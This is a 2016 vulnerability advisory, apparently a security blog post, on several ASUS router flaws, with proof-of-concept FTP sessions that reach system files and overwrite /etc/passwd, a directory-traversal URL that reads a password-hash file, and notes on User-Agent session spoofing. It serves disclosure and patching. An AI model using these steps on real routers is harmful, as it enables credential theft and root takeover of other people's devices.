- Wednesday 20 April 2016

Multiple vulnerabilities affecting several ASUS Routers

Written by Eldar Marcussen

Affected Vendor: ASUS http://www.asus.com/au/Networking/Wireless-Routers-Products/
Affected Device: Multiple - including: RT-AC3200
Affected Version: Multiple - including: 3.0.0.4.378_7838
Issue type: Multiple Vulnerabilities
Release Date: 14 Apr 2016
Discovered by: T.J. Acton
Issue status: Vendor patch available at
http://www.asuswrt.net/2016/03/30/asus-release-beta-firmware-for-acn-router 

Summary

ASUS produces a suite of mid to high-end consumer-grade routers. The RT-AC3200 is confirmed to be affected, and the following devices are assumed to be affected:
TM-AC1900
RT-AC3200
RT-AC87U
RT-AC68U
RT-AC68P
RT-AC68R
RT-AC68W
RT-AC66R
RT-AC66W
RT-AC66U
RT-AC56U
RT-AC51U
RT-N18U
1. Insecure default configuration for the Anonymous FTP user account

Description

The affected ASUS routers suffer from insecure default configuration for Anonymous users, once anonymous access in enabled. Write access is enabled for all directories in the attached storage by default. Furthermore, the administrator is not able to restrict read or write access for any specific directories on attached storage devices.

Impact

The anonymous FTP user can write arbitrary files to the attached storage device.

2. FTP users can access certain system files when Download Master is installed

Description

The affected routers suffer from a vulnerability relating to symlinks and weak permissions for FTP Users, including the Anonymous FTP User. Users are able to gain limited access to certain system files and directories when Download Master is installed.

Impact

The attacker can read certain system files via FTP.

3. FTP users can read all system files, and retrieve an unsalted root password hash, when Download Master is installed

Description

The affected routers suffer from a vulnerability relating to symlinks and weak permissions for FTP Users, including the Anonymous FTP User. Users are able to access all system files and directories, including /etc. This vulnerability leads to SSH / admin interface access due to the exposure of the Lighttpd password stored as an unsalted MD5 hash - this password is automatically created by copying the root user’s existing credentials for SSH / Administrative Interface access.

Legend:
Condition A: When Download Master is installed
Condition B: When read access for the ASUSWARE.ARM USB directory had already been granted to any other FTP user at the time the anonymous user account was enabled
Condition C: When read access for the ASUSWARE.ARM USB directory has been granted to the current FTP user


UserConditions
AnonymousFTP User AccountsCondition ACondition BCondition C
xxx
xxx

Impact

The attacker gains access to all system files, including /etc/passwd. Exposure of unsalted MD5 lighthttpd password hash, which is automatically created by copying the root user’s credentials for SSH / Administrative Interface access

Proof of concept

A complete PoC exploit script will be released after public disclosure. The script leverages an anonymous user account, or a valid FTP user account, retrieves and cracks the root password hash, and attempts to spawn an SSH shell in the context of the root user.

$ ftp 192.168.1.1
Connected to 192.168.1.1.
220 Welcome to ASUS RT-AC3200 FTP service.
Name (192.168.1.1:acton): anonymous
331 Please specify the password.
Password: 
230 Login successful.
ftp> cd /../opt
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||19683|)
150 Here comes the directory listing.
lrwxrwxrwx    1 0        0              39 Jan 06 12:58 asusware.arm -> /tmp/mnt/sda1/asusware.arm/asusware.arm
drwxr-xr-x    2 0        0             860 Jan 06 12:58 bin
lrwxrwxrwx    1 0        0              30 Jan 06 12:58 etc -> /tmp/mnt/sda1/asusware.arm/etc
lrwxrwxrwx    1 0        0              34 Jan 06 12:58 include -> /tmp/mnt/sda1/asusware.arm/include
lrwxrwxrwx    1 0        0              31 Jan 06 12:58 info -> /tmp/mnt/sda1/asusware.arm/info
drwxr-xr-x    2 0        0            2860 Jan 06 12:58 lib
lrwxrwxrwx    1 0        0              30 Jan 06 12:58 man -> /tmp/mnt/sda1/asusware.arm/man
lrwxrwxrwx    1 0        0              31 Jan 06 12:58 sbin -> /tmp/mnt/sda1/asusware.arm/sbin
lrwxrwxrwx    1 0        0              32 Jan 06 12:58 share -> /tmp/mnt/sda1/asusware.arm/share
lrwxrwxrwx    1 0        0              30 Jan 06 12:58 tmp -> /tmp/mnt/sda1/asusware.arm/tmp
lrwxrwxrwx    1 0        0              30 Jan 06 12:58 usr -> /tmp/mnt/sda1/asusware.arm/usr
226 Directory send OK.
ftp> cd etc
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||39223|)
150 Here comes the directory listing.
drwxrwxrwx    1 0        0            4096 Jan 06 12:57 asus_conf.d
-rwxrwxrwx    1 0        0           11269 Jul 22  2013 asus_lighttpd.conf
-rwxrwxrwx    1 0        0              39 Feb 18  2014 asus_lighttpdpassword
-rwxrwxrwx    1 0        0            3264 Oct 25  2012 asus_modules.conf
drwxrwxrwx    1 0        0            4096 Jan 06 12:57 asus_script
drwxrwxrwx    1 0        0            4096 Jan 06 12:58 dm2_amule
-rwxrwxrwx    1 0        0              40 Jan 06 12:58 dm2_ed2k.conf
-rwxrwxrwx    1 0        0             694 Jan 06 12:58 dm2_general.conf
-rwxrwxrwx    1 0        0             694 Jan 06 12:58 dm2_general_bak.conf
-rwxrwxrwx    1 0        0           36108 Jan 06 12:58 dm2_nzbget.conf
-rwxrwxrwx    1 0        0              97 Jan 06 12:58 dm2_snarf.conf
-rwxrwxrwx    1 0        0             156 Jan 06 12:58 dm2_transmission.conf
drwxrwxrwx    1 0        0            4096 Jan 06 12:57 downloadmaster
-rwxrwxrwx    1 0        0               0 Jan 05 12:15 hello.html
drwxrwxrwx    1 0        0            4096 Jan 06 12:57 init.d
-rwxrwxrwx    1 0        0             263 Jan 06 12:58 ipkg.conf
-rwxrwxrwx    1 0        0             214 Jan 06 14:09 passwd
-rwxrwxrwx    1 0        0              23 Jan 05 12:20 test.sh
226 Directory send OK.

FTP users can overwrite arbitrary system files

Description

The affected routers suffer from a vulnerability relating to symlinks and weak permissions for FTP Users, including the Anonymous FTP User. Users are able to overwrite arbitrary files, including system files. This vulnerability leads to SSH / admin interface access due to the exposure of the Lighttpd password stored as an unsalted MD5 hash - this password is automatically created by copying the root user’s existing credentials for SSH / Administrative Interface access.

Legend:
Condition A: When Download Master is installed
Condition B: When write access for the ASUSWARE.ARM USB directory had already been granted to any other FTP user at the time the anonymous user account was enabled
Condition C: When write access for the ASUSWARE.ARM USB directory has been granted to the current FTP user
UserConditions
AnonymousFTP User AccountsCondition ACondition BCondition C
xxx
xxx

Impact

The attacker gains write privileges to all system files, including /etc/passwd and /etc/shadow.

Proof of concept

ftp> cd etc
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||39223|)
150 Here comes the directory listing.
drwxrwxrwx    1 0        0            4096 Jan 06 12:57 asus_conf.d
-rwxrwxrwx    1 0        0           11269 Jul 22  2013 asus_lighttpd.conf
-rwxrwxrwx    1 0        0              39 Feb 18  2014 asus_lighttpdpassword
-rwxrwxrwx    1 0        0            3264 Oct 25  2012 asus_modules.conf
drwxrwxrwx    1 0        0            4096 Jan 06 12:57 asus_script
drwxrwxrwx    1 0        0            4096 Jan 06 12:58 dm2_amule
-rwxrwxrwx    1 0        0              40 Jan 06 12:58 dm2_ed2k.conf
-rwxrwxrwx    1 0        0             694 Jan 06 12:58 dm2_general.conf
-rwxrwxrwx    1 0        0             694 Jan 06 12:58 dm2_general_bak.conf
-rwxrwxrwx    1 0        0           36108 Jan 06 12:58 dm2_nzbget.conf
-rwxrwxrwx    1 0        0              97 Jan 06 12:58 dm2_snarf.conf
-rwxrwxrwx    1 0        0             156 Jan 06 12:58 dm2_transmission.conf
drwxrwxrwx    1 0        0            4096 Jan 06 12:57 downloadmaster
-rwxrwxrwx    1 0        0               0 Jan 05 12:15 hello.html
drwxrwxrwx    1 0        0            4096 Jan 06 12:57 init.d
-rwxrwxrwx    1 0        0             263 Jan 06 12:58 ipkg.conf
-rwxrwxrwx    1 0        0             214 Jan 06 14:09 passwd
-rwxrwxrwx    1 0        0              23 Jan 05 12:20 test.sh
226 Directory send OK.
ftp> put passwd
local: passwd remote: passwd
229 Entering Extended Passive Mode (|||41235|)
150 Ok to send data.
100% |*************************************************************************************************************************************|   214      283.94 KiB/s    00:00 ETA
226 File receive OK.
214 bytes sent in 00:00 (60.83 KiB/s)

Sensitive file disclosure in AiCloud’s AiDisk server

Description

AiCloud suffers from sensitive file exposure. Authenticated users are able to access sensitive files, including password and configuration files, via a directory traversal bug in AiCloud’s AiDisk server.
This vulnerability can lead to SSH/admin interface access as a result of unsalted MD5 hashed password disclosure. Note: unauthenticated users can exploit this issue whilst impersonating an administrative user via TJA-ASUS-06)

Impact

Attackers can access sensitive files.

Proof of concept

https://192.168.1.1/RT-AC3200/sda1%2fasusware.arm/etc%2fasus_lighttpdpassword

Session management flaw in AiCloud

Description

AiCloud suffers from a session management flaw. If the attacker has the same external network (or is on the same local network), they can spoof their User-Agent to match the admin’s User-Agent, and by doing so impersonate the Admin user. This is only possible while the Admin has an active session. Note: This vulnerability can lead to SSH/admin interface access as a result of unsalted MD5 hashed password disclosure, as per issue TJA-ASUS-05

Impact

Attackers can access sensitive files.

Sensitive information disclosure in MiniDLNA server

Description

The MiniDLNA server on port 8200 suffers from a remote, unauthenticated sensitive information disclosure. Exposed information includes: details of all clients (including: internal IP address, MAC address, and device type), and file type statistics for attached storage devices.

Impact

Attackers can access sensitive information remotely, without authentication.

Proof of concept

http://[IP/HOST]:8200

MiniDLNA status

Media library

Audio files    347
Video files    0
Image files    6

Connected clients

ID    Type                    IP Address        HW Address            Connections
0    Samsung Series [CDEF]    192.168.1.99    48:5A:3F:6D:02:A4    0
1    Unknown                    192.168.1.55    78:31:C1:CD:11:63    0

0 connections currently open

Solution

Apply the patch available for download from vendor at the following address:
http://www.asuswrt.net/2016/03/30/asus-release-beta-firmware-for-acn-router/

Response timeline

07/01/2016 - Vendor contacted
22/03/2016 - Patch available.
26/03/2016 - Advisory released.

No comments:

Post a Comment